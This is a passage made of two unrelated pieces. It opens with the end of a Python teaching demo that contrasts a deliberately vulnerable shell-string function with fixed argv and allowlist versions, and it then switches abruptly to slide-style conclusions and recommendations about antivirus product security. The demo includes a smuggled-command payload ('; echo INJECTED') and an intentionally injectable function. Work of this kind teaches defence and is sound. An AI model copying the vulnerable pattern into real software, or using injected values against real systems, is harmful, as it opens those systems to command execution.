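    if INCOMPLETE_BLACKLIST.search(password):
        return "rejected"
    cmd = f"echo checking {user} {password}"   # 'echo' stands in for the real backend command
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def check_user_no_shell(user: str, password: str) -> str:
    """Core fix: an argument vector and no shell, so separators are plain bytes."""
    argv = ["echo", "checking", user, password]
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


def check_user_fixed(user: str, password: str) -> str:
    """Defence in depth: allowlist the input, then run it without a shell."""
    if not PASSWORD_ALLOWLIST.fullmatch(password):
        return "rejected"
    return check_user_no_shell(user, password)


def demo(payload: str = "1234567; echo INJECTED") -> dict:
    """Run the three variants on the separator-style payload and report what happened."""
    vuln = check_user_vulnerable("admin", payload)
    return {
        # the shell split the string into two commands
        "vulnerable_ran_second_command": vuln.splitlines() == ["checking admin 1234567", "INJECTED"],
        # same bytes reach the program as a single argument
        "no_shell_output": check_user_no_shell("admin", payload),
        "fixed_output": check_user_fixed("admin", payload),
    }


if __name__ == "__main__":
    print(demo())
```

The `exec`-style call the page describes has no equivalent of `shell=False`; in PHP the same fix is to avoid building a shell command from credentials at all, or at minimum to pass each value through `escapeshellarg()` rather than a hand-written character filter.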


Conclusions

In general, AV software...

...doesn't make you any safer against skilled attackers.
...increases your attack surface.
...makes you more vulnerable to skilled attackers.
...is as vulnerable to attacks as any other application.

Some AV software...

...may lower your operating system protections.
...is plagued by both local and remote vulnerabilities.

Some AV companies...

...don't give a fuck about security in their products.

Recommendations

Recommendations for AV users

Do not blindly trust your AV product.

BTW, do not trust your AV product. Also, do not trust your AV product. Nope. I cannot stress it enough.

Isolate the machines with AV engines used for gateways, network inspection, etc... Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.

Recommendations for AV companies

Audit your products: source code reviews & fuzzing.

No, AV comparatives and the like are not even remotely close to this. Running a Bug Bounty, like Avast, is a very good idea too.

Do not use the highest privileges possible for scanning network packets, files, etc...

You don't need to be root/system to scan a network packet or a file. You only need root/system to get the contents of that packet or file. Send the network packet or file contents to another, low privileged or sandboxed, process.

Recommendations for AV companies

Run dangerous code under an emulator, VM or, at the very least, in a sandbox. I only know 2 AVs using this approach.

Dangerous code: file parsers written in C/C++. If one finds a vulnerability and it's running inside an emulator/sandbox one also needs an escape vulnerability to completely own the AV engine.

Why is it harder to exploit browsers or document readers than security products?

Another option could be to use a “safer” language. Some AV products, actually, are doing this: using Lua, for example. I'm not talking about signing the files. I'm talking about your AV's running processes.

Do not trust your own processes. They can be owned.


Recommendations for AV companies

Do not use plain HTTP for updating your product.

Use SSL/TLS. Also, digitally sign all files.

No, CRC is not a signature. Really.

...and verify there is nothing else after the signature.

Recommendations for AV companies

Drop old code that is of no use today or make this code not available by default.

Code for MS-DOS era viruses, packers, protectors, etc... Parsers for file format vulnerabilities in products completely unsupported nowadays.

Such old code not touched in years is likely to have vulnerabilities. This is up to you, what do you prefer? Fail at stupid AV comparatives (AV-Test, anyone?) not detecting viruses from the Jurassic, or have a more secure product?

Questions?
